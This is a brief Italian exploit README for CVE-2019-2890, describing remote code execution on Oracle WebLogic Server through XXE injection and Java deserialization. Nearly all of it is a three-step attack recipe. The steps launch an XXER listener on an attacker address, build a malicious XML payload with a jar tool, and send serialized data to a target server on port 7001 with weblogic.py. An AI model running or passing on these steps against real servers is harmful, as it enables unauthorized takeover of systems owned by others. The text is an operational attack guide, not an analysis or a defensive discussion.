
Exploit per CVE-2019-2890 che mira a Oracle WebLogic Server tramite iniezione XXE e deserializzazione, consentendo l'esecuzione remota di codice attraverso payload modificati.
1)Avvia lo strumento XXER python xxer.py -H 192.168.17.223
2)Metti il PoC di xxer nel file xx.xml, sostituisci i dati serializzati e inietta il PoC di xxer; java -jar weblogic_xxe.jar xx.xml
3)Usa weblogic.py dello strumento java-deserialization-exploit per inviare i dati al server WebLogic python weblogic.py 192.168.17.222 7001 weblogic